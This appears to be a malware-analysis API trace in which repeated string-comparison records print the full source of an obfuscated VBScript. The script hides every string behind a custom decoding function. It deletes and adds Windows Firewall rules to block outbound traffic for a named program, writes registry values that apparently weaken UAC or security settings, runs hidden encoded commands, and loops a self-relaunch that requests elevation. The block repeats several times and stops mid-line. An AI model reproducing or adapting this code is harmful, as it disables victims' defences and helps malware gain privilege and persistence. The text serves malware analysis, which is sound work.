NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 38 [0222.969] wcsncmp (_String1=",Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31 [0222.969] wcsncmp (_String1="Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 63 [0222.970] wcsncmp (_String1="en(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0222.970] wcsncmp (_String1="n(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite 